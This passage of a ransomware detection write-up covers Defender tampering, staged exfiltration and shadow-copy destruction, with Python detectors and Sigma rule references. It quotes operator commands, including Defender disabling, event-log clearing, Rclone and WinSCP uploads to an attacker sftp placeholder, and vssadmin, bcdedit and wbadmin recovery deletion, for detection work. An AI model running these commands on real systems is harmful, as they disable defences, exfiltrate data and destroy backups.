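# The three Set-MpPreference parameters from the table plus their close siblings (my extension).
TAMPER_PARAMS = {"disablerealtimemonitoring", "disablebehaviormonitoring", "disableioavprotection",
                 "exclusionpath", "exclusionextension", "exclusionprocess"}
DEFENDER_POLICY_KEY = "\\policies\\microsoft\\windows defender\\"
POLICY_VALUES = {"disableantispyware", "disableantivirus", "disablerealtimemonitoring"}
MPCMDRUN_REMOVE = re.compile(r"\bmpcmdrun(\.exe)?\b.*-removedefinitions\b", re.I)
WEVTUTIL_CLEAR = re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\s+\"?(?P<log>[^\"]+?)\"?\s*$", re.I)

# Constructed sample telemetry (not real): process command lines and Sysmon EID 13 value sets.
SAMPLE_PROCESS_EVENTS = [
    {"host": "FS01", "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "FS01", "cmdline": r"powershell Set-MpPreference -ExclusionPath C:\Users\Public\Music -ExclusionExtension .exe"},
    {"host": "FS01", "cmdline": "mpcmdrun.exe -RemoveDefinitions -All"},
    {"host": "FS01", "cmdline": "wevtutil cl Security"},
    {"host": "FS01", "cmdline": 'wevtutil cl "Microsoft-Windows-PowerShell/Operational"'},
    {"host": "WS-0099", "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $false"},  # re-enabling
    {"host": "WS-0099", "cmdline": "wevtutil cl Application"},
]
SAMPLE_REGISTRY_EVENTS = [
    {"host": "FS01", "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    {"host": "FS01", "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring",
     "Details": "DWORD (0x00000001)"},
    {"host": "FS01", "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent",
     "Details": "DWORD (0x00000001)"},   # policy noise, not a kill switch
]


def tamper_from_cmdline(cmdline):
    """Return (technique, detail) pairs found in one command line."""
    out = []
    m = SET_MPPREF.search(cmdline)
    if m:
        for p in PARAM.finditer(m.group("args")):
            name, value = p.group("name").lower(), p.group("value").strip("'\"")
            if name not in TAMPER_PARAMS:
                continue
            if name.startswith("disable") and value.lower() not in ("$true", "true", "1"):
                continue                          # turning protection back on is not tampering
            out.append(("mppref:" + name, value))
    if MPCMDRUN_REMOVE.search(cmdline):
        out.append(("mpcmdrun_removedefinitions", cmdline))
    w = WEVTUTIL_CLEAR.search(cmdline)
    if w:
        out.append(("eventlog_clear", w.group("log")))
    return out


def tamper_from_registry(ev):
    """Policy-key value sets that switch Defender off; returns (technique, key) or None."""
    path = ev["TargetObject"].lower()
    value_name = path.rsplit("\\", 1)[-1]
    if DEFENDER_POLICY_KEY in path and value_name in POLICY_VALUES and "0x00000001" in ev["Details"]:
        return "registry:" + value_name, ev["TargetObject"]
    return None


def stacked_defender_kill(process_events, registry_events, min_techniques=3):
    """Per host, collect distinct Defender-tampering techniques, the paths/extensions
    excluded, and cleared logs; report hosts that stacked at least `min_techniques`."""
    per_host = {}

    def bucket(host):
        return per_host.setdefault(host, {"techniques": set(), "exclusions": [], "cleared_logs": []})

    for ev in process_events:
        for tech, detail in tamper_from_cmdline(ev["cmdline"]):
            if tech == "eventlog_clear":
                bucket(ev["host"])["cleared_logs"].append(detail)
                continue
            bucket(ev["host"])["techniques"].add(tech)
            if tech.startswith("mppref:exclusion"):
                bucket(ev["host"])["exclusions"].append(detail)
    for ev in registry_events:
        hit = tamper_from_registry(ev)
        if hit:
            bucket(ev["host"])["techniques"].add(hit[0])
    return {h: {"techniques": sorted(d["techniques"]), "exclusions": d["exclusions"],
                "cleared_logs": d["cleared_logs"]}
            for h, d in per_host.items() if len(d["techniques"]) >= min_techniques}
```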
> **Detection Opportunity:**
>
> See rule(s): [[edr-win-def-defender-tampering]] | [[edr-win-impact-inhibit-recovery]]
---
## Chokepoint 8: Exfiltration - The Staging-Transfer Pattern
Exfiltration follows a two-step pattern across every group: **stage with an archiver, transfer with a sync tool**. The archiver and transfer tool vary, but the pattern is invariant.
### Step 1: Staging
| Tool | Groups | Count |
|---|---|---|
| WinRAR (`-ep1 -scul -r0`) | Akira, Play, Qilin, Black Basta, RansomHub | **5+** |
| 7-Zip | TheGentlemen, LockBit | **2+** |
WinRAR is the most abused archiving tool across Sophos 2026 IR cases. The flag combination is a near-universal staging signature:
```
WinRAR.exe a -ep1 -scul -r0 -iext -imon1 -- . "C:\Data\Share\Finance"
WinRAR.exe a -ep1 -scul -r0 -iext -imon1 -- . "C:\Data\Share\Human Resources"
```
Optimized for fast bulk archiving without compression. Alert on WinRAR with `-ep1`, `-scul`, and `-r0` together.
### Step 2: Transfer
| Tool | Groups | Count |
|---|---|---|
| Rclone (often renamed) | Akira, Embargo, Qilin, Fog, RansomHub, Hunters Int'l | **6+** |
| WinSCP (SFTP/FTP) | Akira, Play, Qilin, Hunters International | **4+** |
| MegaSync / MEGA | Embargo, Qilin | **2+** |
| Cyberduck CLI | Qilin | **1** |
| GoodSync (renamed `wininit.exe`) | Chaos | **1** |
Operators substitute freely between transfer tools. eSentire documented Hunters International trying Rclone first and switching to WinSCP when it was blocked.
```
# Rclone (often renamed)
crowdstrike.exe copy --include-from inc.txt "\\FILESERVER\shares" remote:bucket # Akira
svhost.exe copy \\FILESERVER\shares remote:mega-bucket --transfers 16 # Embargo
# WinSCP
winscp.exe /command "open sftp://user@[C2]:16826" "put *.rar" "exit" # Play
# Cyberduck
cyberduck-cli transfer /target s3://bucket # Qilin
```
Detection via PE metadata (`Rsync for cloud storage`) rather than filename is essential for catching renamed Rclone variants.
The chokepoint: regardless of the specific tool, the behavioral pattern is the same - a non-standard process making large outbound transfers to cloud storage or external SFTP. Three detections (WinRAR staging, Rclone metadata, WinSCP command-line) cover the space.
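An added example (mine, not from the original analysis) that implements the three exfiltration detections named above and, because it needs the same tool-identification logic, the Chokepoint 5 tunneling detection as well: Rclone is identified by PE metadata (the `Rsync for cloud storage` description) so renaming does not help, WinRAR is flagged only when `-ep1`, `-scul` and `-r0` appear together, WinSCP's scripted `/command` sequence is extracted, and cloudflared/ngrok/chisel/reverse-SSH are recognized from the command-line shapes shown in the tunneling section. The command-line grammars and all sample events are my constructions.

```python
import os
import re

CANONICAL_IMAGE = {"rclone": "rclone.exe", "winrar": "winrar.exe", "winscp": "winscp.exe",
                   "cloudflared": "cloudflared.exe", "ngrok": "ngrok.exe", "chisel": "chisel.exe",
                   "ssh": "ssh.exe"}
PHASE = {"winrar": "staging", "rclone": "transfer", "winscp": "transfer",
         "cloudflared": "tunnel", "ngrok": "tunnel", "chisel": "tunnel", "ssh": "tunnel"}
# Command-line shapes taken from the observed command blocks on this page; checked in this
# order, most specific first, with the broad rclone shape last.
CMDLINE_GRAMMAR = {
    "cloudflared": re.compile(r"\btunnel\s+run\b.*--token\b", re.I),
    "ngrok": re.compile(r"\b(config\s+add-authtoken|tcp\s+\d{2,5})\b", re.I),
    "chisel": re.compile(r"\bclient\s+\S+\s+R:\S*", re.I),
    "ssh": re.compile(r"\bssh(\.exe)?\b.*\s-R\s+\d+", re.I),
    "winscp": re.compile(r"\bwinscp(\.exe)?\"?\s+/command\b", re.I),
    "winrar": re.compile(r"\b(winrar|rar)(\.exe)?\"?\s+a\b", re.I),
    # copy/sync/move plus a remote:path argument; the lookahead rejects C:\ and sftp:// forms
    "rclone": re.compile(r"\b(copy|sync|move)\b.*\s[\w.-]+:(?![\\/])\S*", re.I),
}
WINRAR_STAGING_FLAGS = {"-ep1", "-scul", "-r0"}

# Constructed sample process-creation events (Sysmon EID 1 fields); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\crowdstrike.exe", "OriginalFileName": "rclone.exe",
     "Description": "Rsync for cloud storage",
     "CommandLine": r'crowdstrike.exe copy --include-from inc.txt "\\FILESERVER\shares" remote:bucket'},
    {"Image": r"C:\Windows\Temp\svhost.exe", "OriginalFileName": None, "Description": None,   # metadata stripped
     "CommandLine": r"svhost.exe copy \\FILESERVER\shares remote:mega-bucket --transfers 16"},
    {"Image": r"C:\Program Files\WinRAR\WinRAR.exe", "OriginalFileName": "WinRAR.exe", "Description": "WinRAR",
     "CommandLine": r'WinRAR.exe a -ep1 -scul -r0 -iext -imon1 -- . "C:\Data\Share\Finance"'},
    {"Image": r"C:\Program Files\WinRAR\WinRAR.exe", "OriginalFileName": "WinRAR.exe", "Description": "WinRAR",
     "CommandLine": r'WinRAR.exe a -r backup.rar "C:\Users\jdoe\Documents"'},           # ordinary use
    {"Image": r"C:\Users\Public\winscp.exe", "OriginalFileName": "WinSCP.exe", "Description": "WinSCP",
     "CommandLine": r'winscp.exe /command "open sftp://user@[C2]:16826" "put *.rar" "exit"'},
    {"Image": r"C:\Users\Public\ng.exe", "OriginalFileName": None, "Description": None,
     "CommandLine": "ng.exe tcp 3389"},
    {"Image": r"C:\Windows\Temp\cloudflared.exe", "OriginalFileName": None, "Description": None,
     "CommandLine": "cloudflared.exe tunnel run --token [REDACTED]"},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe", "Description": "Windows Command Processor",
     "CommandLine": r"cmd.exe /c copy \\fs\share\a.txt C:\tmp"},                          # benign copy
]


def identify_tool(ev):
    """Name the tool from PE metadata first (survives renaming), then from command-line
    grammar; returns a finding dict, or None for anything that is not staging/transfer/tunnel."""
    image = os.path.basename(ev["Image"].replace("\\", "/")).lower()
    orig = (ev.get("OriginalFileName") or "").lower()
    desc = (ev.get("Description") or "").lower()
    tool, via = None, None
    if orig == "rclone.exe" or "rsync for cloud storage" in desc:
        tool, via = "rclone", "pe-metadata"
    else:
        for name, rx in CMDLINE_GRAMMAR.items():
            if rx.search(ev["CommandLine"]):
                tool, via = name, "cmdline-grammar"
                break
    if tool is None:
        return None
    finding = {"tool": tool, "phase": PHASE[tool], "via": via, "image": image,
               "renamed": image != CANONICAL_IMAGE[tool]}
    quoted = re.findall(r"\"([^\"]+)\"", ev["CommandLine"])
    if tool == "winrar":
        flags = set(re.findall(r"(?<=\s)-[a-z0-9]+", ev["CommandLine"].lower()))
        if not WINRAR_STAGING_FLAGS <= flags:
            return None                         # an archive job without the staging flag set
        finding["targets"] = quoted             # the directories being staged
    elif tool == "winscp":
        finding["script"] = quoted              # the scripted open/put/exit sequence
    return finding


def exfil_and_tunnel_findings(events):
    return [f for f in (identify_tool(e) for e in events) if f]
```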
> **Detection Opportunity:**
>
> See rule(s): [[edr-win-exfil-rclone-usage]] | [[edr-win-exfil-winrar-staging]] | [[edr-win-exfil-winscp-transfer]]
---
## Chokepoint 9: Recovery Destruction - Shadow Copies Die First
The pre-encryption phase is the most tightly converged of all. Shadow copy deletion is functionally universal - it appears in every group that reaches the encryption phase because it *must*.
| Command | Groups | Count |
|---|---|---|
| `vssadmin delete shadows /all /quiet` | Akira, Chaos, Embargo, Qilin, Play, TheGentlemen, Black Basta, LockBit, Fog, RansomHub | **10+** |
| `wmic shadowcopy delete` | Chaos, Embargo, Play, Black Basta | **4+** |
| `bcdedit /set recoveryenabled no` | Chaos, Embargo, Qilin, Black Basta | **4+** |
| `wbadmin delete catalog` | Chaos, Black Basta | **2+** |
| PowerShell `Win32_ShadowCopy \| Remove-WmiObject` | Akira | **1** |
| Mass service termination (SQL, Exchange, Hyper-V, Veeam) | TheGentlemen, LockBit, Black Basta | **3+** |
`vssadmin delete shadows /all /quiet` is the single most universal ransomware operator command in this dataset. Every group uses it because there's no alternative. If shadow copies survive, the victim can recover without paying.
The full recovery destruction sequence, as observed across multiple groups:
```
vssadmin delete shadows /all /quiet
wmic shadowcopy delete /nointeractive
bcdedit /set {default} recoveryenabled no
bcdedit /set {default} bootstatuspolicy ignoreallfailures
wbadmin delete catalog -quiet
```
Not every group runs all five. But `vssadmin delete shadows` is invariant. It's the ultimate chokepoint: no substitution, no variation, no evasion.
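An added example (mine, not from the original analysis) that scores the recovery destruction sequence above per host: each of the six techniques in the table gets one normalized pattern, `vssadmin delete shadows /all` is rated critical on its own, scoped deletes such as `/oldest` that backup agents also issue are rated high, and three or more distinct techniques on one host is reported as the full sequence. Accepting `Remove-CimInstance` alongside the page's `Remove-WmiObject` is my extension, and the sample events are constructed.

```python
import re
from collections import defaultdict

# One pattern per technique in the table above (normalized, lower-case input).
RECOVERY_DESTRUCTION = {
    "vssadmin_delete_shadows": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b"),
    "wmic_shadowcopy_delete": re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\s+delete\b"),
    "bcdedit_recoveryenabled_no": re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b"),
    "bcdedit_ignoreallfailures": re.compile(r"\bbcdedit(\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b"),
    "wbadmin_delete_catalog": re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog\b"),
    "powershell_shadowcopy_remove": re.compile(
        r"win32_shadowcopy\b.*\|\s*(remove-wmiobject|remove-ciminstance)\b"),
}

# Constructed sample process events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "FS01", "cmdline": "vssadmin delete shadows /all /quiet"},
    {"host": "FS01", "cmdline": "wmic shadowcopy delete /nointeractive"},
    {"host": "FS01", "cmdline": "bcdedit /set {default} recoveryenabled no"},
    {"host": "FS01", "cmdline": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"host": "FS01", "cmdline": "wbadmin delete catalog -quiet"},
    {"host": "BK01", "cmdline": r"C:\Windows\System32\vssadmin.exe delete shadows /for=C: /oldest"},  # backup agent housekeeping
    {"host": "WS-0099", "cmdline": "vssadmin list shadows"},
]


def normalize(cmdline):
    return re.sub(r"\s+", " ", cmdline.strip().lower())


def classify(cmdline):
    """Return (technique, severity) or (None, None)."""
    c = normalize(cmdline)
    for label, rx in RECOVERY_DESTRUCTION.items():
        if rx.search(c):
            if label == "vssadmin_delete_shadows" and "/all" in c:
                return label, "critical"      # the universal form from the table
            return label, "high"              # scoped deletes and the other techniques
    return None, None


def recovery_destruction_by_host(events):
    """Per host: distinct techniques, the worst severity seen, and whether three or more
    distinct techniques (the stacked sequence above) were observed."""
    per_host = defaultdict(lambda: {"techniques": set(), "severity": None})
    for ev in events:
        label, sev = classify(ev["cmdline"])
        if not label:
            continue
        d = per_host[ev["host"]]
        d["techniques"].add(label)
        if sev == "critical" or d["severity"] is None:
            d["severity"] = sev
    return {h: {"techniques": sorted(d["techniques"]), "severity": d["severity"],
                "full_sequence": len(d["techniques"]) >= 3}
            for h, d in per_host.items()}
```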
> **Detection Opportunity:** If you detect nothing else, detect this.
>
> See rule: [[edr-win-impact-inhibit-recovery]]
---
## Tempo - How Fast Do They Move?
Dwell time data from vendor reporting reveals a clear trend: operators are getting faster.
| Metric | Value | Source |
|---|---|---|
| Median time to AD compromise | **11 hours** | Sophos Active Adversary 2025 |
| Average time-to-ransomware (TTR) | **~17 hours** | Huntress 2025 Threat Report |
| Akira / RansomHub TTR | **~6 hours** | Huntress 2025 |
| LockBit TTR (Confluence exploit) | **~2 hours** | DFIR Report (CVE-2023-22527) |
| Play (observed intrusion) | **~6 hours** | Firsthand IR data |
| Time from exfil start to detection | **1.87 hours** | Sophos Active Adversary 2026 |
| Ransomware deployed outside business hours | **88%** | Sophos Active Adversary 2026 |
| Recon commands after initial access | **~20 minutes** | Huntress 2025 |
The implication: **if your detection pipeline takes more than 6 hours to escalate, you're losing to the fastest operators.** The recon-to-credential-access window is often under an hour. The credential-to-lateral-movement window is often under 2 hours. By the time shadow copies are being deleted, you have minutes, not hours.
The highest-value detections are the *early* ones - domain enumeration and credential access - not the impact-phase detections that confirm what's already happening.
---
## The Chokepoint Map
Nine chokepoints. Each one is a behavioral bottleneck where the operator has no good alternative. Together, they provide detection coverage across the full kill chain.
| # | Chokepoint | Behavior | Groups |
|---|---|---|---|
| 1 | Recovery Destruction | `vssadmin delete shadows` | 10+ |
| 2 | Domain Recon | `nltest /dclist` / `/domain_trusts` | 10+ |
| 3 | Domain Recon | `net group "Domain Admins" /domain` | 10+ |
| 4 | Lateral Movement | Impacket WmiExec output redirection | 9+ |
| 5 | Credential Access | LSASS memory access (any method) | 9+ |
| 6 | Lateral Movement | PsExec / PAExec remote service creation | 5+ |
| 7 | Exfiltration | Rclone (any binary name, PE metadata) | 6+ |
| 8 | Exfiltration | WinRAR staging (`-ep1 -scul -r0`) | 5+ |
| 9 | Exfiltration | WinSCP command-line transfer | 4+ |
The exfiltration phase requires three detections because operators substitute freely. No single tool dominates - but at least one of the three appears in every group that documents exfiltration.
Beyond the top 9, the next tier of chokepoints - reverse tunneling (cloudflared/ngrok/chisel), RMM tool abuse, Defender tampering, and event log clearing - collectively cover the persistence, C2, and evasion phases with high fidelity.
---
## Detections
Open-source Sigma rules covering the chokepoints identified in this analysis:
| Rule ID | Description |
|---|---|
| [[edr-win-impact-inhibit-recovery]] | System Recovery Inhibition |
| [[edr-win-disc-nltest-domain-trusts]] | Domain Trust Enumeration via Nltest |
| [[edr-win-disc-net-priv-group-enum]] | Privileged Domain Group Enumeration via Net |
| [[edr-win-lat-impacket-wmiexec]] | Impacket WmiExec Lateral Movement |
| [[edr-win-cred-lsass-minidump]] | LSASS Memory Dump via Comsvcs.dll |
| [[edr-win-lat-remote-psexec]] | Remote PsExec Service Execution |
| [[edr-win-exfil-rclone-usage]] | Rclone Data Exfiltration |
| [[edr-win-exfil-winrar-staging]] | WinRAR Data Staging with Exfiltration Flags |
| [[edr-win-exfil-winscp-transfer]] | WinSCP Command-Line File Transfer |
| [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell |
| [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution |
| [[edr-win-persist-rmm-deployment]] | Unauthorized RMM Tool Deployment |
| [[edr-win-disc-netscan-deployment]] | SoftPerfect Network Scanner Execution |
| [[edr-win-disc-adfind-enum]] | AdFind LDAP Enumeration |
| [[edr-win-cred-reg-hive-dump]] | Registry Hive Credential Dump |
| [[edr-win-cred-veeam-db-access]] | Veeam Backup Credential Database Access |
| [[edr-win-cred-browser-esentutl]] | Browser Credential Theft via Esentutl |
| [[edr-win-cred-ntlm-internal-monologue]] | NTLM Hash Theft via Internal Monologue |
---
## Key Publications
1. [CISA/FBI - #StopRansomware: Akira Ransomware (AA24-109A)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a) (Apr 2024, updated Nov 2025)
2. [CISA/FBI/ASD - #StopRansomware: Play Ransomware (AA23-352A)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a) (Dec 2023, updated Jun 2025)
3. [CISA/FBI - #StopRansomware: Black Basta (AA24-131A)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a) (May 2024)
4. [CISA/FBI - #StopRansomware: RansomHub (AA24-242a)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-242a) (Aug 2024)
5. [CISA/FBI - #StopRansomware: Interlock (AA25-203a)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a) (Jul 2025)
6. [Sophos - Nowhere, Man: The 2026 Active Adversary Report](https://www.sophos.com/en-us/blog/2026-sophos-active-adversary-report) (2026)
7. [Sophos - It Takes Two: The 2025 Active Adversary Report](https://news.sophos.com/en-us/2025/04/02/2025-sophos-active-adversary-report/) (Apr 2025)
8. [DFIR Report - Navigating Through the Fog](https://thedfirreport.com/2025/04/28/navigating-through-the-fog/) (Apr 2025)
9. [DFIR Report - Cobalt Strike and a Pair of SOCKS Lead to LockBit](https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/) (Jan 2025)
10. [DFIR Report - Confluence Exploit Leads to LockBit Ransomware](https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/) (Feb 2025)
11. [DFIR Report - Blurring the Lines: Three Ransomware Gangs](https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-connection-with-three-major-ransomware-gangs/) (Sep 2025)
12. [DFIR Report - Cat's Got Your Files: Lynx Ransomware](https://thedfirreport.com/2025/11/17/cats-got-your-files-lynx-ransomware/) (Nov 2025)
13. [Huntress - 2025 Cyber Threat Report](https://www.huntress.com/blog/huntress-2025-cyber-threat-report-proliferating-rats-evolving-ransomware-and-other-findings) (2025)
14. [eSentire - From Access to Encryption: Hunters International](https://www.esentire.com/blog/from-access-to-encryption-dissecting-hunters-internationals-latest-ransomware-attack) (Feb 2025)
15. [ESET - Shifting the Sands of RansomHub's EDRKillShifter](https://www.welivesecurity.com/en/eset-research/shifting-sands-ransomhub-edrkillshifter/) (Mar 2025)
16. [Cisco Talos - Qilin EDR Killer Infection Chain](https://blog.talosintelligence.com/qilin-edr-killer/) (Apr 2026)